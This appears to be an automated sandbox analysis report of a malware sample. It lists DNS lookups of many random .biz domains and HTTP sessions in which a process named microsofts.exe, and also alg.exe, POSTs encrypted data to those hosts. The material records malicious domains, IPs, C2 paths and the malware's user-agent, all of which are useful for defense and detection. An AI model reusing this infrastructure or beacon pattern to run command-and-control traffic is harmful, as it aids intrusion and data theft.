                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.055941105 CEST1.1.1.1192.168.2.50x74dbNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.524832010 CEST1.1.1.1192.168.2.50xae9bNo error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.092335939 CEST1.1.1.1192.168.2.50xc9b6No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.678770065 CEST1.1.1.1192.168.2.50x127bNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.950445890 CEST1.1.1.1192.168.2.50x1370No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.432939053 CEST1.1.1.1192.168.2.50x1741No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.081075907 CEST1.1.1.1192.168.2.50x345cNo error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.286775112 CEST1.1.1.1192.168.2.50x7f19No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343812943 CEST1.1.1.1192.168.2.50x48bdNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343839884 CEST1.1.1.1192.168.2.50x48bdNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.596824884 CEST1.1.1.1192.168.2.50x99fbNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.597018003 CEST1.1.1.1192.168.2.50x99fbNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.100629091 CEST1.1.1.1192.168.2.50x7784No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.862147093 CEST1.1.1.1192.168.2.50xc2e0No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.038822889 CEST1.1.1.1192.168.2.50x434eNo error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.640398026 CEST1.1.1.1192.168.2.50xafd2No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.141946077 CEST1.1.1.1192.168.2.50x891cNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.141946077 CEST1.1.1.1192.168.2.50x891cNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.521702051 CEST1.1.1.1192.168.2.50x8148No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.965785027 CEST1.1.1.1192.168.2.50x4b20No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.720726967 CEST1.1.1.1192.168.2.50xd91cNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.299818039 CEST1.1.1.1192.168.2.50x1b38No error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.628931046 CEST1.1.1.1192.168.2.50xa06dNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.647563934 CEST1.1.1.1192.168.2.50x9a49No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.405123949 CEST1.1.1.1192.168.2.50xed89No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.490252018 CEST1.1.1.1192.168.2.50x58fdNo error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.305067062 CEST1.1.1.1192.168.2.50x69b8No error (0)xccjj.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.853338957 CEST1.1.1.1192.168.2.50x3543No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.226409912 CEST1.1.1.1192.168.2.50xea7fNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.365505934 CEST1.1.1.1192.168.2.50x659eNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.870474100 CEST1.1.1.1192.168.2.50xd10fNo error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.004905939 CEST1.1.1.1192.168.2.50xa194No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.582066059 CEST1.1.1.1192.168.2.50x4a08No error (0)vyome.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.125083923 CEST1.1.1.1192.168.2.50xb850No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.700743914 CEST1.1.1.1192.168.2.50xcce5No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.771612883 CEST1.1.1.1192.168.2.50xf098No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.772023916 CEST1.1.1.1192.168.2.50xf098No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.368706942 CEST1.1.1.1192.168.2.50xf98fNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.451927900 CEST1.1.1.1192.168.2.50x30a4No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.754210949 CEST1.1.1.1192.168.2.50xbf57No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.873372078 CEST1.1.1.1192.168.2.50xdc87No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.132422924 CEST1.1.1.1192.168.2.50x9b43No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.497543097 CEST1.1.1.1192.168.2.50xeb95No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.103873968 CEST1.1.1.1192.168.2.50xeaecNo error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.875994921 CEST1.1.1.1192.168.2.50x96c7No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.019077063 CEST1.1.1.1192.168.2.50x945dNo error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.193454027 CEST1.1.1.1192.168.2.50xd13dNo error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.392004013 CEST1.1.1.1192.168.2.50xa8a4No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.270463943 CEST1.1.1.1192.168.2.50x7c5No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.276465893 CEST1.1.1.1192.168.2.50xec83No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.310811043 CEST1.1.1.1192.168.2.50xa107No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.348547935 CEST1.1.1.1192.168.2.50x8c49No error (0)qpnczch.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.386734009 CEST1.1.1.1192.168.2.50xd23aNo error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.440347910 CEST1.1.1.1192.168.2.50x2f6dNo error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.481398106 CEST1.1.1.1192.168.2.50x8d59No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.495523930 CEST1.1.1.1192.168.2.50x70ccNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.545144081 CEST1.1.1.1192.168.2.50xa379No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.291323900 CEST1.1.1.1192.168.2.50x419cNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.462415934 CEST1.1.1.1192.168.2.50xc834No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.462444067 CEST1.1.1.1192.168.2.50xc834No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.498116016 CEST1.1.1.1192.168.2.50x3072No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.962832928 CEST1.1.1.1192.168.2.50x7a2No error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:14.380506039 CEST1.1.1.1192.168.2.50x798fNo error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.344424009 CEST1.1.1.1192.168.2.50x523No error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.385799885 CEST1.1.1.1192.168.2.50xc268No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.414088011 CEST1.1.1.1192.168.2.50x8bd1No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.414092064 CEST1.1.1.1192.168.2.50x8bd1No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.755819082 CEST1.1.1.1192.168.2.50xafffNo error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.476671934 CEST1.1.1.1192.168.2.50xb71dNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.183769941 CEST1.1.1.1192.168.2.50x70ccNo error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.492815971 CEST1.1.1.1192.168.2.50x2d00No error (0)pectx.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.982605934 CEST1.1.1.1192.168.2.50x46b2No error (0)xccjj.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.248027086 CEST1.1.1.1192.168.2.50x21eeNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.702675104 CEST1.1.1.1192.168.2.50x916aNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.120650053 CEST1.1.1.1192.168.2.50x1ba6No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.194258928 CEST1.1.1.1192.168.2.50xe6ccNo error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.171539068 CEST1.1.1.1192.168.2.50x5d71No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.171607018 CEST1.1.1.1192.168.2.50x5d71No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.415685892 CEST1.1.1.1192.168.2.50x3d64No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                          • api.ipify.org
                                                                                                                                                                                                                                                                                                          • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                          • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                          • cvgrf.biz
                                                                                                                                                                                                                                                                                                          • npukfztj.biz
                                                                                                                                                                                                                                                                                                          • przvgke.biz
                                                                                                                                                                                                                                                                                                          • knjghuig.biz
                                                                                                                                                                                                                                                                                                          • lpuegx.biz
                                                                                                                                                                                                                                                                                                          • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                          • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                          • ifsaia.biz
                                                                                                                                                                                                                                                                                                          • saytjshyf.biz
                                                                                                                                                                                                                                                                                                          • vcddkls.biz
                                                                                                                                                                                                                                                                                                          • fwiwk.biz
                                                                                                                                                                                                                                                                                                          • tbjrpv.biz
                                                                                                                                                                                                                                                                                                          • deoci.biz
                                                                                                                                                                                                                                                                                                          • gytujflc.biz
                                                                                                                                                                                                                                                                                                          • qaynky.biz
                                                                                                                                                                                                                                                                                                          • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                          • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                          • nqwjmb.biz
                                                                                                                                                                                                                                                                                                          • ytctnunms.biz
                                                                                                                                                                                                                                                                                                          • myups.biz
                                                                                                                                                                                                                                                                                                          • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                          • yunalwv.biz
                                                                                                                                                                                                                                                                                                          • jpskm.biz
                                                                                                                                                                                                                                                                                                          • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                          • wllvnzb.biz
                                                                                                                                                                                                                                                                                                          • gnqgo.biz
                                                                                                                                                                                                                                                                                                          • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                          • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                          • vyome.biz
                                                                                                                                                                                                                                                                                                          • yauexmxk.biz
                                                                                                                                                                                                                                                                                                          • iuzpxe.biz
                                                                                                                                                                                                                                                                                                          • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                          • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                          • ftxlah.biz
                                                                                                                                                                                                                                                                                                          • typgfhb.biz
                                                                                                                                                                                                                                                                                                          • esuzf.biz
                                                                                                                                                                                                                                                                                                          • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                          • qpnczch.biz
                                                                                                                                                                                                                                                                                                          • brsua.biz
                                                                                                                                                                                                                                                                                                          • dlynankz.biz
                                                                                                                                                                                                                                                                                                          • oflybfv.biz
                                                                                                                                                                                                                                                                                                          • yhqqc.biz
                                                                                                                                                                                                                                                                                                          • mnjmhp.biz
                                                                                                                                                                                                                                                                                                          • opowhhece.biz
                                                                                                                                                                                                                                                                                                          • jdhhbs.biz
                                                                                                                                                                                                                                                                                                          • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                          • warkcdu.biz
                                                                                                                                                                                                                                                                                                          • gcedd.biz
                                                                                                                                                                                                                                                                                                          • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                          • xccjj.biz
                                                                                                                                                                                                                                                                                                          • hehckyov.biz
                                                                                                                                                                                                                                                                                                          • rynmcq.biz
                                                                                                                                                                                                                                                                                                          • uaafd.biz
                                                                                                                                                                                                                                                                                                          • eufxebus.biz
                                                                                                                                                                                                                                                                                                          • pwlqfu.biz
                                                                                                                                                                                                                                                                                                          • rrqafepng.biz
                                                                                                                                                                                                                                                                                                          • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                          • tnevuluw.biz
                                                                                                                                                                                                                                                                                                          • whjovd.biz
                                                                                                                                                                                                                                                                                                          • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                          • reczwga.biz
                                                                                                                                                                                                                                                                                                          • bghjpy.biz
                                                                                                                                                                                                                                                                                                          • damcprvgv.biz
                                                                                                                                                                                                                                                                                                          • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                          • ywffr.biz
                                                                                                                                                                                                                                                                                                          • ecxbwt.biz
                                                                                                                                                                                                                                                                                                          • pectx.biz
                                                                                                                                                                                                                                                                                                          • zyiexezl.biz
                                                                                                                                                                                                                                                                                                          • banwyw.biz

                                                                                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          0192.168.2.54970554.244.188.17780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.741784096 CEST360OUTPOST /rurmblummdysikl HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.741784096 CEST828OUTData Raw: c6 bc e7 6e 35 82 a3 54 30 03 00 00 11 94 e1 3a 09 0a 6c ab 8a 82 06 bd f8 9d 94 09 35 b0 a7 38 f4 67 07 24 6a 18 18 21 23 22 75 8d d0 40 31 a6 14 4a 3e c1 7e bd 2f df ff 04 68 f2 b9 1a bd 11 e8 b1 c4 02 41 bf 13 ca cd b4 24 5f 7b 4d d5 88 a1 46
                                                                                                                                                                                                                                                                                                          Data Ascii: n5T0:l58g$j!#"u@1J>~/hA$_{MF^ivE`S&QIBqsO1l(%kdizo2=`OxEwd@"ir,/W#3;*:<XQf=eDP<IsZ!vcs>c(J
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.471059084 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:24 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=7b2a5cbaabbd0fc0efd7208a65a4dc1c|8.46.123.33|1728547644|1728547644|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          1192.168.2.54970718.141.10.10780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.144601107 CEST350OUTPOST /qmfuhtf HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.144620895 CEST828OUTData Raw: 1b 90 86 93 d0 59 b3 b6 30 03 00 00 b3 dc 73 4d 29 00 66 b8 f6 cc 9e cb bf 71 ff 6c 56 db b6 a9 0e ae 87 7a c1 3b 2c b1 51 77 31 e4 bb 01 2a f4 9f 31 8f 47 57 b6 5b 31 ca 7a 11 d9 72 d4 fd d5 78 9f 9c 63 2d e9 14 f8 88 16 7a e3 b9 5e 1c a3 b8 61
                                                                                                                                                                                                                                                                                                          Data Ascii: Y0sM)fqlVz;,Qw1*1GW[1zrxc-z^a1g4PRSP-Jr9rS#HFR9vQIMz&F-;aUS[d{46T>,v=\+?<5WF!X?=N]ve
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.609658957 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:26 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=4d09b8e0a5960d4bd1ab494c8c320a46|8.46.123.33|1728547646|1728547646|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          2192.168.2.54970854.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.172862053 CEST350OUTPOST /mxhgf HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.172878981 CEST778OUTData Raw: 83 51 c8 e9 66 00 f3 0c fe 02 00 00 4e 31 3a 24 45 34 e4 02 04 f2 76 85 cf dc 30 e2 73 65 ae 77 9f 61 6d 2c 1f 2d dc 9b 3c a7 b1 f2 fa bd be 9b 06 46 f2 6e bd f8 00 f0 61 69 b3 5e 42 a5 08 47 b4 6d 8c 17 d1 64 ac 81 d7 0b 99 1f 39 54 a5 92 e2 8b
                                                                                                                                                                                                                                                                                                          Data Ascii: QfN1:$E4v0sewam,-<Fnai^BGmd9TH,")S7R`49SH/FI$w$[m_"6VK\p?r-mt|<iDi6L^4t(lplj&w s?nEvb%?\zp
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.895824909 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:25 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=0c9075829c940128493346420bafe6e6|8.46.123.33|1728547645|1728547645|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          3192.168.2.54970954.244.188.17780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.811873913 CEST345OUTPOST /agup HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.811894894 CEST828OUTData Raw: 07 56 a2 c2 4a 26 a5 9d 30 03 00 00 79 eb a1 e5 22 08 04 6b dc 02 a3 0c db ca 8c 0e e3 67 ca 27 f0 80 37 bc 06 cf 89 82 c1 27 ec d9 a9 df 67 24 9c c5 9b 56 e5 aa af cd 12 ed 23 2b 2d 7c a0 b5 b6 7f c4 e7 ca f7 95 e1 14 75 f9 de 0e 35 e4 ae d6 9b
                                                                                                                                                                                                                                                                                                          Data Ascii: VJ&0y"kg'7'g$V#+-|u57&$1iGR-*F5N)W2n\_j)BWE'H?JHn^*\b%8}L(JLbrR*O'Fx2e0/+<%9tE
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:27.530631065 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:27 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
